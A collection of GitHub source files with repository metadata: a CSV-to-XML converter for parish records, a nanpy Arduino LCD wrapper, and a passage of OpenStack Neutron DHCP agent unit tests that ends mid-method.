"content_hash": "90192cfe8945f6ec50807bd58e0ecea4",
"timestamp": "",
"source": "github",
"line_count": 577,
"max_line_length": 83,
"avg_line_length": 27.760831889081455,
"alnum_prop": 0.652078911224872,
"repo_name": "robovero/python",
"id": "7c550407506004b1d94cfb489b3969e11c346ef2",
"size": "16018",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "robovero/lpc17xx_i2s.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "348265"
}
],
"symlink_target": ""
}
|
"""
ABPRefFromBigCSV.py
convert CSV data to XML (ref format)
26,000 csv format
need a list of ABP image keys to extract the correct line (S_Passau_Hals_008_0084)
H. Déjean
copyright NLE 2017
READ project
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from optparse import OptionParser
#import sys, os.path
from lxml import etree
import csv
class CSV2REF(object):
    """Load a CSV export and generate an XML "ref" file for a set of image keys."""
    # Component version, usage and description (shown by optparse).
    version = "v1.0"
    description = "load CSV file and extract records corresponding to image key. Generate a ref "
    name = "CSV2REF"
    usage = ""

    def __init__(self):
        # Input CSV / output XML paths, CSV delimiter and key-list file;
        # all of these are filled in later by setParams().
        self.inputFileName = None
        self.outputFileName = None
        self.sDelimiter = ','
        self.keylist = None
    ## Add a parameter to the component.
    ## Syntax is similar to optparse.OptionParser.add_option (the Python module
    ## optparse, class OptionParser, method add_option)
    #@param *args (passing by position)
    #@param **kwargs (passing by name)
    def add_option(self, *args, **kwargs):
        """add a new command line option to the parser"""
        self.parser.add_option(*args, **kwargs)
    def createCommandLineParser(self):
        """Build the optparse parser with the standard -i/-o/-d options."""
        self.parser = OptionParser(usage=self.usage, version=self.version)
        self.parser.description = self.description
        self.add_option("-i", "--input", dest="input", default="-", action="store", type="string", help="input DB file", metavar="<file>")
        self.add_option("-o", "--output", dest="output", default="-", action="store", type="string", help="output REF file", metavar="<file>")
        # NOTE(review): the command-line default delimiter is ';' while
        # __init__ defaults to ',' — confirm which one is intended.
        self.add_option("-d", "--delimiter", dest="delimiter", default=";", action="store", type="string", help="delimiter used in csv", metavar="S")
        # self.add_option("--test", dest="test", default=False, action="store_true", help="test")
def parseCommandLine(self):
(options, args) = self.parser.parse_args()
dOptions = {}
for k,v in options.__dict__.items():
if v != None: dOptions[k] = v
return dOptions, args
def setParams(self, dParams):
"""
Here, we set our internal attribute according to a possibly specified value (otherwise it stays at its default value)
"""
#if some input or output was defined, they take precedence to the config
bInput = "input" in dParams.keys()
if bInput: self.inputFileName = dParams["input"]
bOutput = "output" in dParams.keys()
if bOutput: self.outputFileName = dParams["output"]
if "delimiter" in dParams.keys(): self.sDelimiter=dParams['delimiter']
if "keylist" in dParams.keys(): self.keylist=dParams['keylist']
def loadDB(self,dbfilename,keylist):
"""
Open and read csv file
'Aicha-an-der-Donau','4','3','5','Erber','Barbara','1','','','1','Täufling','1847','','','','','','','','','','','5356405','5392401','springer_2016-07-26'
simply filter with parishes first
"""
lParishes = list(map(lambda x:x[0],keylist))
db=[]
with open(dbfilename,'r',encoding='utf-8') as dbfilename:
dbreader= csv.reader(dbfilename,delimiter=self.sDelimiter,quotechar="'")
for lFields in dbreader:
if lFields[0] in lParishes:
db.append(lFields)
return db
    def convertIntoRef(self,db,keylist):
        """
        Group the selected DB rows per ABP page key and write them out as a
        DOCUMENT/PAGE/RECORD XML tree to self.outputFileName.

        Column layout of a row:
        'qapfarrei','qaband','teilband','qaseite','name','vorname','folge','ort','beruf','fkt','funktion','jahr','monat','tag','alter_jahre','alter_monate','alter_wochen','alter_tage','alter_stunden','kommentar','zusatz','num_zusatz','mkz','pdkz','benutzer'
        'Aicha-an-der-Donau','4','3','5','Erber','Barbara','1','','','1','Täufling','1847','','','','','','','','','','','5356405','5392401','springer_2016-07-26'
        """
        # group per page
        # or per date ?
        dPages= {}
        for key in keylist:
            keyfound=None
            for field in db:
                # 4: verst -- keep only rows whose 'fkt' column (index 9) is '4'
                if field[9] != '4':
                    continue
                savedKey=key[:]
                bandteil = key[1].split('-')
                # test for ['Zimmern', '005-03', '0015-01'] 0015-01 not int
                try: int(key[2])
                except ValueError:
                    continue
                # a missing teilband counts as 0
                if len(bandteil) == 1:
                    bandteil.append('0')
                # empty band/page columns are normalized to '0'
                if field[2] =='': field[2]='0'
                if field[3] =='': field[3]='0'
                # print (field,bandteil,key)
                if field[0] == key[0] and int(field[1]) == int(bandteil[0]) and int(field[2]) == int(bandteil[1]) and int(field[3]) == int(key[2]):
                    # skip entries whose name/firstname has a trailing blank
                    if field[4][-1] == ' ' or field[5][-1] == ' ':continue
                    keyfound=savedKey
                    pagefield=field[3]
                    skey =field[0].replace('-','_')
                    # rebuild the ABP image key: parish_band[_teilband]_page
                    if field[2] =='0':
                        abpkey = "%s_%03d_%04d"%(skey,int(field[1]),int(field[3]))
                    else:
                        abpkey = "%s_%03d_%02d_%04d"%(skey,int(field[1]),int(field[2]),int(field[3]))
                    try:
                        dPages[abpkey].append(field)
                    except KeyError: dPages[abpkey]=[field]
                    continue
        # except ValueError: print( 'ISSUE:',field)
        rootNode= etree.Element("DOCUMENT")
        refdoc = etree.ElementTree(element=rootNode)
        for i,pagenum in enumerate(sorted(dPages)):
            domp=etree.Element("PAGE")
            # some pages may be missing
            # domp.set('number',str(i+1))
            # pagenum of the first record
            domp.set('number',dPages[pagenum][0][3])
            domp.set('pagenum',str(pagenum))
            domp.set('nbrecords',str(len( dPages[pagenum])))
            #year(s)
            lyears = set(map(lambda x:x[11],dPages[pagenum]))
            if len(lyears)==1:
                domp.set('years',list(lyears)[0])
            else:
                # NOTE(review): with 3+ distinct years only two end up in the
                # attribute, and set ordering is arbitrary — confirm intended.
                domp.set('years',"%s-%s"%(list(lyears)[0],list(lyears)[1]))
            # print pagenum, domp.prop('years')
            rootNode.append(domp)
            for lfields in dPages[pagenum]:
                # print lfields
                #'qapfarrei','qaband','teilband','qaseite','name','vorname','folge','ort','beruf','fkt','funktion','jahr','monat','tag','alter_jahre','alter_monate','alter_wochen','alter_tage','alter_stunden','kommentar','zusatz','num_zusatz','mkz','pdkz','benutzer'
                # 0 1 2 3 4 5 6 7
                record = etree.Element("RECORD")
                domp.append(record)
                record.set('lastname',lfields[4])
                record.set('firstname',lfields[5])
                record.set('role',lfields[10])
                record.set('location',lfields[7])
                record.set('occupation',lfields[8])
                record.set('family',lfields[19])
                record.set('year',lfields[11])
                record.set('month',lfields[12])
                record.set('day',lfields[13])
                record.set('age-year',lfields[14])
                record.set('age-month',lfields[15])
                record.set('age-week',lfields[16])
                record.set('age-day',lfields[17])
                record.set('age-hour',lfields[18])
        # default output name: the input file name with a .xml extension
        if self.outputFileName == '-':
            self.outputFileName = self.inputFileName[:-3]+'xml'
        # rootNode.saveFormatFileEnc(self.outputFileName, "UTF-8",True)
        refdoc.write(self.outputFileName, xml_declaration=True, encoding='UTF-8',pretty_print=True)
def processKey(self,lKeys):
"""
key can have _ in the name part! S_Bayerbach_008-01_0083
"""
lFinalKey=[]
for key in lKeys:
if key[1] != '_':key = '_'+key
lk = key.split('_')
# two last elt : bandteil, (-NN), page (NNNN)
# skip the frist one: role =S, T,..
newkey= ["-".join(lk[1:-2])]
newkey.extend(lk[-2:])
# print (newkey)
lFinalKey.append(newkey)
# if len(lk) == 5:
# lFinalKey.append(['%s-%s'%(lk[1],lk[2]),lk[3],lk[4]])
# elif len(lk) == 4:
# lFinalKey.append([lk[1],lk[2],lk[3]])
return lFinalKey
    def run(self):
        """Read the key-list file, load the matching CSV rows and write the ref XML."""
        keyfile= open(self.keylist)
        # -5
        # strip the trailing 6 characters (image-file suffix) from each key line
        lKeys= list(map(lambda x:x[:-6].strip(),keyfile.readlines()))
        lKeys = self.processKey(lKeys)
        print (lKeys)
        db = self.loadDB(self.inputFileName,lKeys)
        # NOTE(review): convertIntoRef returns None, so refxml is always None
        # (and run() itself returns None to the caller).
        refxml = self.convertIntoRef(db,lKeys)
if __name__ == "__main__":
    # Renamed the local from `cmp` (shadowed a Python 2 builtin) to `converter`.
    converter = CSV2REF()
    # Prepare the command-line parser and register the key-list option.
    converter.createCommandLineParser()
    converter.add_option("-k", '--key',dest="keylist", action="store", type="string", help="file containing the image keys")
    dParams, args = converter.parseCommandLine()
    converter.setParams(dParams)
    doc = converter.run()
    print ("conversion done")
|
{
"content_hash": "c3113cbf20a16b3aee5f5be3dbfa119c",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 262,
"avg_line_length": 42.01716738197425,
"alnum_prop": 0.5229826353421859,
"repo_name": "Transkribus/TranskribusDU",
"id": "658fffa742efdf4473f45d9cf4a20473cd3e5277",
"size": "9819",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "usecases/ABP/src/ABPRefFromBigCVS.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "2140"
},
{
"name": "HTML",
"bytes": "7987"
},
{
"name": "Python",
"bytes": "3804398"
},
{
"name": "Shell",
"bytes": "2069"
}
],
"symlink_target": ""
}
|
from nanpy.arduinoboard import ArduinoObject
from nanpy.arduinoboard import arduinoobjectmethod
class Lcd(ArduinoObject):
    """Proxy for an Arduino LiquidCrystal (HD44780-style) LCD.

    The decorated methods have intentionally empty (``pass``) bodies: the
    ``arduinoobjectmethod`` decorator presumably serialises each call and
    forwards it to the board over the connection — confirm against
    ``nanpy.arduinoboard``.  Actual display behaviour is firmware-side.
    """
    # Firmware configuration flag that must be enabled for this feature.
    cfg_h_name = 'USE_LiquidCrystal'
    def __init__(self, pins, begin, connection=None):
        '''
        Create the remote LiquidCrystal object on the board.

        :param pins: [rs, enable, d4, d5, d6, d7]
        :param begin: [cols, rows]
        :param connection: board connection; default connection when None.
        '''
        ArduinoObject.__init__(self, connection=connection)
        # The remote constructor returns the object id used by later calls.
        self.id = self.call('new', pins, begin)
    @arduinoobjectmethod
    def printString(self, value, col = None, row = None):
        """Print *value*; ``col``/``row`` presumably position the cursor
        first — firmware-side behaviour, confirm before relying on it."""
        pass
    @arduinoobjectmethod
    def setCursor(self, col, row):
        """Move the cursor to (col, row) (firmware-side)."""
        pass
    @arduinoobjectmethod
    def autoscroll(self):
        """Enable display autoscroll (firmware-side)."""
        pass
    @arduinoobjectmethod
    def noAutoscroll(self):
        """Disable display autoscroll (firmware-side)."""
        pass
    @arduinoobjectmethod
    def clear(self):
        """Clear the display (firmware-side)."""
        pass
    @arduinoobjectmethod
    def createChar(self, num, data):
        """Define custom glyph *num* from *data* (firmware-side)."""
        pass
    @arduinoobjectmethod
    def write(self, data):
        """Write raw data to the display (firmware-side)."""
        pass
|
{
"content_hash": "36b06ba4eda2ebf426058dbcb2985fb7",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 59,
"avg_line_length": 22.853658536585368,
"alnum_prop": 0.6221985058697972,
"repo_name": "nanpy/nanpy",
"id": "49b6b370e55c6d52808b60e580104897f41cb9af",
"size": "937",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nanpy/lcd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "125648"
}
],
"symlink_target": ""
}
|
import copy
import sys
import uuid
import eventlet
import mock
from oslo.config import cfg
import testtools
from neutron.agent.common import config
from neutron.agent import dhcp_agent
from neutron.agent.linux import dhcp
from neutron.agent.linux import interface
from neutron.common import config as common_config
from neutron.common import constants as const
from neutron.common import exceptions
from neutron.common import rpc as n_rpc
from neutron.tests import base
# Host name handed to the agents instantiated by the tests below.
HOSTNAME = 'hostname'
dev_man = dhcp.DeviceManager
rpc_api = dhcp_agent.DhcpPluginApi
# Dotted paths used as mock.patch targets for the device manager and the
# DHCP plugin RPC proxy.
DEVICE_MANAGER = '%s.%s' % (dev_man.__module__, dev_man.__name__)
DHCP_PLUGIN = '%s.%s' % (rpc_api.__module__, rpc_api.__name__)
fake_tenant_id = 'aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'
# Subnet fixtures: fake_subnet1 is DHCP-enabled (172.9.9.0/24),
# fake_subnet2 is DHCP-disabled, fake_subnet3 is a second enabled subnet,
# fake_meta_subnet models the metadata network range.
fake_subnet1_allocation_pools = dhcp.DictModel(dict(id='', start='172.9.9.2',
                                               end='172.9.9.254'))
fake_subnet1 = dhcp.DictModel(dict(id='bbbbbbbb-bbbb-bbbb-bbbbbbbbbbbb',
                              network_id='12345678-1234-5678-1234567890ab',
                              cidr='172.9.9.0/24', enable_dhcp=True, name='',
                              tenant_id=fake_tenant_id,
                              gateway_ip='172.9.9.1', host_routes=[],
                              dns_nameservers=[], ip_version=4,
                              allocation_pools=fake_subnet1_allocation_pools))
fake_subnet2_allocation_pools = dhcp.DictModel(dict(id='', start='172.9.8.2',
                                               end='172.9.8.254'))
fake_subnet2 = dhcp.DictModel(dict(id='dddddddd-dddd-dddd-dddddddddddd',
                              network_id='12345678-1234-5678-1234567890ab',
                              cidr='172.9.8.0/24', enable_dhcp=False, name='',
                              tenant_id=fake_tenant_id, gateway_ip='172.9.8.1',
                              host_routes=[], dns_nameservers=[], ip_version=4,
                              allocation_pools=fake_subnet2_allocation_pools))
fake_subnet3 = dhcp.DictModel(dict(id='bbbbbbbb-1111-2222-bbbbbbbbbbbb',
                              network_id='12345678-1234-5678-1234567890ab',
                              cidr='192.168.1.1/24', enable_dhcp=True))
fake_meta_subnet = dhcp.DictModel(dict(id='bbbbbbbb-1111-2222-bbbbbbbbbbbb',
                                  network_id='12345678-1234-5678-1234567890ab',
                                  cidr='169.254.169.252/30',
                                  gateway_ip='169.254.169.253',
                                  enable_dhcp=True))
# Fixed IPs and port fixtures used to populate the fake networks.
fake_fixed_ip1 = dhcp.DictModel(dict(id='', subnet_id=fake_subnet1.id,
                                ip_address='172.9.9.9'))
fake_meta_fixed_ip = dhcp.DictModel(dict(id='', subnet=fake_meta_subnet,
                                    ip_address='169.254.169.254'))
fake_allocation_pool_subnet1 = dhcp.DictModel(dict(id='', start='172.9.9.2',
                                              end='172.9.9.254'))
fake_port1 = dhcp.DictModel(dict(id='12345678-1234-aaaa-1234567890ab',
                            device_id='dhcp-12345678-1234-aaaa-1234567890ab',
                            device_owner='',
                            allocation_pools=fake_subnet1_allocation_pools,
                            mac_address='aa:bb:cc:dd:ee:ff',
                            network_id='12345678-1234-5678-1234567890ab',
                            fixed_ips=[fake_fixed_ip1]))
fake_port2 = dhcp.DictModel(dict(id='12345678-1234-aaaa-123456789000',
                            device_owner='',
                            mac_address='aa:bb:cc:dd:ee:99',
                            network_id='12345678-1234-5678-1234567890ab',
                            fixed_ips=[]))
# Router-interface port on the metadata network.
fake_meta_port = dhcp.DictModel(dict(id='12345678-1234-aaaa-1234567890ab',
                                mac_address='aa:bb:cc:dd:ee:ff',
                                network_id='12345678-1234-5678-1234567890ab',
                                device_owner=const.DEVICE_OWNER_ROUTER_INTF,
                                device_id='forzanapoli',
                                fixed_ips=[fake_meta_fixed_ip]))
# Network fixtures covering the common test scenarios: a normal network,
# an isolated one (no router), an empty one, the metadata network, and an
# administratively-down network.
fake_network = dhcp.NetModel(True, dict(id='12345678-1234-5678-1234567890ab',
                             tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
                             admin_state_up=True,
                             subnets=[fake_subnet1, fake_subnet2],
                             ports=[fake_port1]))
isolated_network = dhcp.NetModel(
    True, dict(
        id='12345678-1234-5678-1234567890ab',
        tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
        admin_state_up=True,
        subnets=[fake_subnet1],
        ports=[fake_port1]))
empty_network = dhcp.NetModel(
    True, dict(
        id='12345678-1234-5678-1234567890ab',
        tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
        admin_state_up=True,
        subnets=[fake_subnet1],
        ports=[]))
fake_meta_network = dhcp.NetModel(
    True, dict(id='12345678-1234-5678-1234567890ab',
               tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
               admin_state_up=True,
               subnets=[fake_meta_subnet],
               ports=[fake_meta_port]))
fake_down_network = dhcp.NetModel(
    True, dict(id='12345678-dddd-dddd-1234567890ab',
               tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
               admin_state_up=False,
               subnets=[],
               ports=[]))
class TestDhcpAgent(base.BaseTestCase):
    """Unit tests for the DHCP agent's startup, sync and resync logic.

    The interface driver, state-report RPC and filesystem side effects are
    mocked out in setUp so each test exercises agent logic only.
    """
    def setUp(self):
        super(TestDhcpAgent, self).setUp()
        dhcp_agent.register_options()
        cfg.CONF.set_override('interface_driver',
                              'neutron.agent.linux.interface.NullDriver')
        # disable setting up periodic state reporting
        cfg.CONF.set_override('report_interval', 0, 'AGENT')
        self.driver_cls_p = mock.patch(
            'neutron.agent.dhcp_agent.importutils.import_class')
        self.driver = mock.Mock(name='driver')
        self.driver.existing_dhcp_networks.return_value = []
        self.driver_cls = self.driver_cls_p.start()
        self.driver_cls.return_value = self.driver
        self.mock_makedirs_p = mock.patch("os.makedirs")
        self.mock_makedirs = self.mock_makedirs_p.start()
    def test_dhcp_agent_manager(self):
        state_rpc_str = 'neutron.agent.rpc.PluginReportStateAPI'
        # sync_state is needed for this test
        cfg.CONF.set_override('report_interval', 1, 'AGENT')
        with mock.patch.object(dhcp_agent.DhcpAgentWithStateReport,
                               'sync_state',
                               autospec=True) as mock_sync_state:
            with mock.patch.object(dhcp_agent.DhcpAgentWithStateReport,
                                   'periodic_resync',
                                   autospec=True) as mock_periodic_resync:
                with mock.patch(state_rpc_str) as state_rpc:
                    with mock.patch.object(sys, 'argv') as sys_argv:
                        sys_argv.return_value = [
                            'dhcp', '--config-file',
                            base.etcdir('neutron.conf.test')]
                        cfg.CONF.register_opts(dhcp_agent.DhcpAgent.OPTS)
                        config.register_interface_driver_opts_helper(cfg.CONF)
                        config.register_agent_state_opts_helper(cfg.CONF)
                        config.register_root_helper(cfg.CONF)
                        cfg.CONF.register_opts(dhcp.OPTS)
                        cfg.CONF.register_opts(interface.OPTS)
                        common_config.init(sys.argv[1:])
                        agent_mgr = dhcp_agent.DhcpAgentWithStateReport(
                            'testhost')
                        eventlet.greenthread.sleep(1)
                        agent_mgr.after_start()
                        mock_sync_state.assert_called_once_with(agent_mgr)
                        mock_periodic_resync.assert_called_once_with(agent_mgr)
                        state_rpc.assert_has_calls(
                            [mock.call(mock.ANY),
                             mock.call().report_state(mock.ANY, mock.ANY,
                                                      mock.ANY)])
    def test_dhcp_agent_main_agent_manager(self):
        logging_str = 'neutron.agent.common.config.setup_logging'
        launcher_str = 'neutron.openstack.common.service.ServiceLauncher'
        with mock.patch(logging_str):
            with mock.patch.object(sys, 'argv') as sys_argv:
                with mock.patch(launcher_str) as launcher:
                    sys_argv.return_value = ['dhcp', '--config-file',
                                             base.etcdir('neutron.conf.test')]
                    dhcp_agent.main()
                    launcher.assert_has_calls(
                        [mock.call(), mock.call().launch_service(mock.ANY),
                         mock.call().wait()])
    def test_run_completes_single_pass(self):
        with mock.patch(DEVICE_MANAGER):
            dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
            attrs_to_mock = dict(
                [(a, mock.DEFAULT) for a in
                 ['sync_state', 'periodic_resync']])
            with mock.patch.multiple(dhcp, **attrs_to_mock) as mocks:
                dhcp.run()
                mocks['sync_state'].assert_called_once_with()
                mocks['periodic_resync'].assert_called_once_with()
    def test_call_driver(self):
        network = mock.Mock()
        network.id = '1'
        dhcp = dhcp_agent.DhcpAgent(cfg.CONF)
        self.assertTrue(dhcp.call_driver('foo', network))
        self.driver.assert_called_once_with(cfg.CONF,
                                            mock.ANY,
                                            'sudo',
                                            mock.ANY,
                                            mock.ANY)
    def _test_call_driver_failure(self, exc=None,
                                  trace_level='exception', expected_sync=True):
        network = mock.Mock()
        network.id = '1'
        self.driver.return_value.foo.side_effect = exc or Exception
        with mock.patch.object(dhcp_agent.LOG, trace_level) as log:
            dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
            with mock.patch.object(dhcp,
                                   'schedule_resync') as schedule_resync:
                self.assertIsNone(dhcp.call_driver('foo', network))
                self.driver.assert_called_once_with(cfg.CONF,
                                                    mock.ANY,
                                                    'sudo',
                                                    mock.ANY,
                                                    mock.ANY)
                self.assertEqual(log.call_count, 1)
                self.assertEqual(expected_sync, schedule_resync.called)
    def test_call_driver_failure(self):
        self._test_call_driver_failure()
    def test_call_driver_remote_error_net_not_found(self):
        self._test_call_driver_failure(
            exc=n_rpc.RemoteError(exc_type='NetworkNotFound'),
            trace_level='warning')
    def test_call_driver_network_not_found(self):
        self._test_call_driver_failure(
            exc=exceptions.NetworkNotFound(net_id='1'),
            trace_level='warning')
    def test_call_driver_conflict(self):
        self._test_call_driver_failure(
            exc=exceptions.Conflict(),
            trace_level='warning',
            expected_sync=False)
    def _test_sync_state_helper(self, known_networks, active_networks):
        with mock.patch(DHCP_PLUGIN) as plug:
            mock_plugin = mock.Mock()
            mock_plugin.get_active_networks_info.return_value = active_networks
            plug.return_value = mock_plugin
            dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
            attrs_to_mock = dict(
                [(a, mock.DEFAULT) for a in
                 ['refresh_dhcp_helper', 'disable_dhcp_helper', 'cache']])
            with mock.patch.multiple(dhcp, **attrs_to_mock) as mocks:
                mocks['cache'].get_network_ids.return_value = known_networks
                dhcp.sync_state()
                exp_refresh = [
                    mock.call(net_id) for net_id in active_networks]
                diff = set(known_networks) - set(active_networks)
                exp_disable = [mock.call(net_id) for net_id in diff]
                mocks['cache'].assert_has_calls([mock.call.get_network_ids()])
                # BUG FIX: the previous ``assert_has_called`` is not a Mock
                # assertion method — Mock auto-creates unknown attributes, so
                # these expectations were silently never checked.  Use the
                # real API; any_order because per-network order is undefined.
                mocks['refresh_dhcp_helper'].assert_has_calls(exp_refresh,
                                                              any_order=True)
                mocks['disable_dhcp_helper'].assert_has_calls(exp_disable,
                                                              any_order=True)
    def test_sync_state_initial(self):
        self._test_sync_state_helper([], ['a'])
    def test_sync_state_same(self):
        self._test_sync_state_helper(['a'], ['a'])
    def test_sync_state_disabled_net(self):
        self._test_sync_state_helper(['b'], ['a'])
    def test_sync_state_waitall(self):
        class mockNetwork():
            id = '0'
            admin_state_up = True
            subnets = []
            def __init__(self, id):
                self.id = id
        with mock.patch.object(dhcp_agent.eventlet.GreenPool, 'waitall') as w:
            active_networks = [mockNetwork('1'), mockNetwork('2'),
                               mockNetwork('3'), mockNetwork('4'),
                               mockNetwork('5')]
            known_networks = ['1', '2', '3', '4', '5']
            self._test_sync_state_helper(known_networks, active_networks)
            w.assert_called_once_with()
    def test_sync_state_plugin_error(self):
        with mock.patch(DHCP_PLUGIN) as plug:
            mock_plugin = mock.Mock()
            mock_plugin.get_active_networks_info.side_effect = Exception
            plug.return_value = mock_plugin
            with mock.patch.object(dhcp_agent.LOG, 'exception') as log:
                dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
                with mock.patch.object(dhcp,
                                       'schedule_resync') as schedule_resync:
                    dhcp.sync_state()
                    self.assertTrue(log.called)
                    self.assertTrue(schedule_resync.called)
    def test_periodic_resync(self):
        dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
        with mock.patch.object(dhcp_agent.eventlet, 'spawn') as spawn:
            dhcp.periodic_resync()
            spawn.assert_called_once_with(dhcp._periodic_resync_helper)
    # Renamed from test_periodoc_resync_helper (typo in the method name).
    def test_periodic_resync_helper(self):
        with mock.patch.object(dhcp_agent.eventlet, 'sleep') as sleep:
            dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
            dhcp.needs_resync_reasons = ['reason1', 'reason2']
            with mock.patch.object(dhcp, 'sync_state') as sync_state:
                sync_state.side_effect = RuntimeError
                with testtools.ExpectedException(RuntimeError):
                    dhcp._periodic_resync_helper()
            sync_state.assert_called_once_with()
            sleep.assert_called_once_with(dhcp.conf.resync_interval)
            self.assertEqual(len(dhcp.needs_resync_reasons), 0)
    def test_populate_cache_on_start_without_active_networks_support(self):
        # emul dhcp driver that doesn't support retrieving of active networks
        self.driver.existing_dhcp_networks.side_effect = NotImplementedError
        with mock.patch.object(dhcp_agent.LOG, 'debug') as log:
            dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
            self.driver.existing_dhcp_networks.assert_called_once_with(
                dhcp.conf,
                cfg.CONF.root_helper
            )
            self.assertFalse(dhcp.cache.get_network_ids())
            self.assertTrue(log.called)
    def test_populate_cache_on_start(self):
        networks = ['aaa', 'bbb']
        self.driver.existing_dhcp_networks.return_value = networks
        dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
        self.driver.existing_dhcp_networks.assert_called_once_with(
            dhcp.conf,
            cfg.CONF.root_helper
        )
        self.assertEqual(set(networks), set(dhcp.cache.get_network_ids()))
    def test_none_interface_driver(self):
        cfg.CONF.set_override('interface_driver', None)
        with mock.patch.object(dhcp, 'LOG') as log:
            self.assertRaises(SystemExit, dhcp.DeviceManager,
                              cfg.CONF, 'sudo', None)
            msg = 'An interface driver must be specified'
            log.error.assert_called_once_with(msg)
    def test_nonexistent_interface_driver(self):
        # Temporarily turn off mock, so could use the real import_class
        # to import interface_driver.
        self.driver_cls_p.stop()
        self.addCleanup(self.driver_cls_p.start)
        cfg.CONF.set_override('interface_driver', 'foo')
        with mock.patch.object(dhcp, 'LOG') as log:
            self.assertRaises(SystemExit, dhcp.DeviceManager,
                              cfg.CONF, 'sudo', None)
            self.assertEqual(log.error.call_count, 1)
class TestLogArgs(base.BaseTestCase):
    """Tests for config.get_log_args over the log_dir/log_file/syslog matrix."""
    def _args_for(self, conf_dict):
        """Wrap *conf_dict* in a DictModel and return the computed log args."""
        return config.get_log_args(dhcp.DictModel(conf_dict), 'log_file_name')
    def test_log_args_without_log_dir_and_file(self):
        conf = {'debug': True, 'verbose': False, 'log_dir': None,
                'log_file': None, 'use_syslog': True,
                'syslog_log_facility': 'LOG_USER'}
        self.assertEqual(['--debug',
                          '--use-syslog',
                          '--syslog-log-facility=LOG_USER'],
                         self._args_for(conf))
    def test_log_args_without_log_file(self):
        conf = {'debug': True, 'verbose': True, 'log_dir': '/etc/tests',
                'log_file': None, 'use_syslog': False,
                'syslog_log_facility': 'LOG_USER'}
        self.assertEqual(['--debug',
                          '--verbose',
                          '--log-file=log_file_name',
                          '--log-dir=/etc/tests'],
                         self._args_for(conf))
    def test_log_args_with_log_dir_and_file(self):
        conf = {'debug': True, 'verbose': False, 'log_dir': '/etc/tests',
                'log_file': 'tests/filelog', 'use_syslog': False,
                'syslog_log_facility': 'LOG_USER'}
        self.assertEqual(['--debug',
                          '--log-file=log_file_name',
                          '--log-dir=/etc/tests/tests'],
                         self._args_for(conf))
    def test_log_args_without_log_dir(self):
        conf = {'debug': True, 'verbose': False, 'log_file': 'tests/filelog',
                'log_dir': None, 'use_syslog': False,
                'syslog_log_facility': 'LOG_USER'}
        self.assertEqual(['--debug',
                          '--log-file=log_file_name',
                          '--log-dir=tests'],
                         self._args_for(conf))
    def test_log_args_with_filelog_and_syslog(self):
        # log_file/log_dir take precedence over use_syslog here.
        conf = {'debug': True, 'verbose': True, 'log_file': 'tests/filelog',
                'log_dir': '/etc/tests', 'use_syslog': True,
                'syslog_log_facility': 'LOG_USER'}
        self.assertEqual(['--debug',
                          '--verbose',
                          '--log-file=log_file_name',
                          '--log-dir=/etc/tests/tests'],
                         self._args_for(conf))
class TestDhcpAgentEventHandler(base.BaseTestCase):
    """Tests for the agent's RPC event handlers (network/subnet/port CRUD).

    The plugin proxy, network cache, external-process manager and driver
    calls are all mocked in setUp; each test triggers one handler and checks
    the exact sequence of mock calls.
    """
    def setUp(self):
        super(TestDhcpAgentEventHandler, self).setUp()
        config.register_interface_driver_opts_helper(cfg.CONF)
        cfg.CONF.register_opts(dhcp.OPTS)
        cfg.CONF.set_override('interface_driver',
                              'neutron.agent.linux.interface.NullDriver')
        config.register_root_helper(cfg.CONF)
        cfg.CONF.register_opts(dhcp_agent.DhcpAgent.OPTS)
        self.plugin_p = mock.patch(DHCP_PLUGIN)
        plugin_cls = self.plugin_p.start()
        self.plugin = mock.Mock()
        plugin_cls.return_value = self.plugin
        self.cache_p = mock.patch('neutron.agent.dhcp_agent.NetworkCache')
        cache_cls = self.cache_p.start()
        self.cache = mock.Mock()
        cache_cls.return_value = self.cache
        self.mock_makedirs_p = mock.patch("os.makedirs")
        self.mock_makedirs = self.mock_makedirs_p.start()
        self.mock_init_p = mock.patch('neutron.agent.dhcp_agent.'
                                      'DhcpAgent._populate_networks_cache')
        self.mock_init = self.mock_init_p.start()
        with mock.patch.object(dhcp.Dnsmasq,
                               'check_version') as check_v:
            check_v.return_value = dhcp.Dnsmasq.MINIMUM_VERSION
            self.dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
        self.call_driver_p = mock.patch.object(self.dhcp, 'call_driver')
        self.call_driver = self.call_driver_p.start()
        self.schedule_resync_p = mock.patch.object(self.dhcp,
                                                   'schedule_resync')
        self.schedule_resync = self.schedule_resync_p.start()
        self.external_process_p = mock.patch(
            'neutron.agent.linux.external_process.ProcessManager'
        )
        self.external_process = self.external_process_p.start()
    def _enable_dhcp_helper(self, network, enable_isolated_metadata=False,
                            is_isolated_network=False):
        if enable_isolated_metadata:
            cfg.CONF.set_override('enable_isolated_metadata', True)
        self.plugin.get_network_info.return_value = network
        self.dhcp.enable_dhcp_helper(network.id)
        self.plugin.assert_has_calls(
            [mock.call.get_network_info(network.id)])
        self.call_driver.assert_called_once_with('enable', network)
        self.cache.assert_has_calls([mock.call.put(network)])
        # The metadata proxy process is only spawned for isolated networks.
        if is_isolated_network:
